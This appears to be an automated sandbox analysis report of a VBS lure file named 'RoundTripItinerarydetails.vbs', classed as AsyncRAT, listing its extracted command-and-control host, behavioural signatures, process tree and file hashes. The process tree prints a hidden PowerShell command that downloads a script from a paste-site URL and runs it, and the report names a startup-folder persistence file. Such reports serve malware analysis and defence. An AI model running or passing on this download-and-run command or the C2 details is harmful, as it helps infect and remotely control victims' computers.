Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21/01/2025, 21:19
Static task
static1
Behavioral task
behavioral1
Sample
RoundTripItinerarydetails.vbs
Resource
win7-20240903-en
General
-
Target
RoundTripItinerarydetails.vbs
-
Size
780B
-
MD5
44a1dc576cca328a09abc1747cfc6984
-
SHA1
30edd4c5e409ed9702b2ae4a5d16c07dde4e873c
-
SHA256
dac02b322f310cdaa789470be4bbf41fa842781a8010c06aaa346f1e87f96b72
-
SHA512
af3d479790b667aeb268c5304f2490c8d17c669de48ecb5222c9c6c900f3c289417878af5fd5faca16bb543ae5097ae2073f10d5ea80138ff82aaa246b23e534
Malware Config
Extracted
asyncrat
0.5.8
SAFEMODE
BobbyMiller09.bumbleshrimp.com:1987
cQWO7Q45k2CY
-
delay
3
-
install
false
-
install_file
srtsfsuytrrd.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 4 4504 WScript.exe 14 4156 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 4156 powershell.exe 4024 powershell.exe 4156 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsLocalSystemUpgrade.js powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4024 set thread context of 1964 4024 powershell.exe 89 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4156 powershell.exe 4156 powershell.exe 4024 powershell.exe 4024 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4156 powershell.exe Token: SeDebugPrivilege 4024 powershell.exe Token: SeDebugPrivilege 1964 RegAsm.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 4504 wrote to memory of 4156 4504 WScript.exe 83 PID 4504 wrote to memory of 4156 4504 WScript.exe 83 PID 4156 wrote to memory of 4024 4156 powershell.exe 85 PID 4156 wrote to memory of 4024 4156 powershell.exe 85 PID 4024 wrote to memory of 4196 4024 powershell.exe 87 PID 4024 wrote to memory of 4196 4024 powershell.exe 87 PID 4196 wrote to memory of 2764 4196 csc.exe 88 PID 4196 wrote to memory of 2764 4196 csc.exe 88 PID 4024 wrote to memory of 1964 4024 powershell.exe 89 PID 4024 wrote to memory of 1964 4024 powershell.exe 89 PID 4024 wrote to memory of 1964 4024 powershell.exe 89 PID 4024 wrote to memory of 1964 4024 powershell.exe 89 PID 4024 wrote to memory of 1964 4024 powershell.exe 89 PID 4024 wrote to memory of 1964 4024 powershell.exe 89 PID 4024 wrote to memory of 1964 4024 powershell.exe 89 PID 4024 wrote to memory of 1964 4024 powershell.exe 89
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RoundTripItinerarydetails.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command Invoke-WebRequest -Uri 'https://www.pastery.net/qjaxzf/raw/' -OutFile 'C:\Users\Public\WindowsLocalSystem.PS1'; PowerShell -NoProfile -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File 'C:\Users\Public\WindowsLocalSystem.PS1'2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Public\WindowsLocalSystem.PS13⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gx05aibr\gx05aibr.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4196 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBAD4.tmp" "c:\Users\Admin\AppData\Local\Temp\gx05aibr\CSC3BB52A1DDA62480B9E6BE767E5B34AA.TMP"5⤵PID:2764
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD585df31411080f87203ed45b0dab4f336
SHA15bf5b44ce38fa21c305c1a375da9e6ad84f48892
SHA256e15527444c709b53eca9bc57890b4f6340fce53de1b5b0302a547f18da5974e5
SHA512963cf413d03add219bc832009f2ae5de426a4fae0633f02dfe90db4754f375e8bbe06d967bb6cbca59d1c41476126f1c78d2073adb5ba39ca420adafa3b0944c
-
Filesize
1KB
MD5a2b24af1492f112d2e53cb7415fda39f
SHA1dbfcee57242a14b60997bd03379cc60198976d85
SHA256fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA5129919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0
-
Filesize
1KB
MD5ce6af208c9679b06402e07fb15e78edb
SHA163831a3418f790ec3a8a971ad6cb3bbb28e1b2f5
SHA25655c3c42802b757cd7b36fc1e821c70cc486d76544cbe15e9c8078f2a8a3122a4
SHA5120494081ea14d4ff5cee9b9c84d282838daf48f769cd9638fce1a9f1971c1d5b917c5c5635c6b27a4b66f9aaeacfd744f04a0719b729c7688dad8bf9fd75ea700
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
8KB
MD5d8b5188fcdbfc174fa30fdd6d9729d2a
SHA17b1126cc5bf24eeb6c13e2af1d380f0d5fd26185
SHA256ccd630682bb4b8fc9b9eb94ba9ea7517ffdc2f4a438835e3a93a7b8acf5e623c
SHA5127e6008d149018d3c45b8a4f43a2452c7904ddbd8fc83cc4d810bfaa9413d7f7c76c8ebb4d71925fed847bfc7ef9847cebf430490243c4cf893fdb1691d65dfbe
-
Filesize
64KB
MD57cfe3768daedf2504400604ebc508423
SHA110b4491291d4667412600ba58ce31453236c167c
SHA25612a7a72f46df5f631460ed2681cbfa18e19d3c3fdfae96fe8d44cb130dbbc84c
SHA5124a3a35bb4900e35d3b3029eb553621856f779db9aec10305b0dff0287feb59493aa56ce5eb26e62b3714408d40cffaf7806c29eef479d687c216c962801e0cfa
-
Filesize
652B
MD51ca4b067ea711b635ff9eb48f0929987
SHA102a38269268b9bd66cb57e1d4030de7b339b6ef7
SHA256fac7dea62469c481a6d24b712f610732d6114c913515edfcc89fd4b246908292
SHA5129b1827a5ec4da4c6f7f7cb7d517cbef4f0c2e102c0dba56dab9e3578dd6e16ed18915cc4ac00ac8221d56735f0baccbf04c3745b4e661896921e9ab3d4d58f43
-
Filesize
10KB
MD509035af4e642b0b7a269c87cfcac0ad9
SHA1b7dc64c7523dcc3361ab7ae770460f8428a91e1a
SHA25627120c8ed3bd26c821ca413a54a6d5d536ada661eab1abe1c5255ae5a16a27ee
SHA512d1bb5ce5d7d74db101db7360c9b3ada3187c8d6d26456c959d68da45bf99130ac676a1b71eec4881cd045629ac371435ef9f4cac5430614b5f9b4067ef2604f7
-
Filesize
327B
MD5d9d02f924aac8692428a51560d1f532d
SHA19ef8893bb10755c3eb97add2b0ba1fd319d6b7aa
SHA256559cf7529d02b78a232129acd680ef96fe255d9128d23393a32d257c4e8300cb
SHA5127af75ce0efb02ce927f667f8edc62182a7cef18ef07a45fb8ac3924e47e41e267eb6062af7090200c2e4df722498be4989c6c8c6d3e866a3399b29db9335c899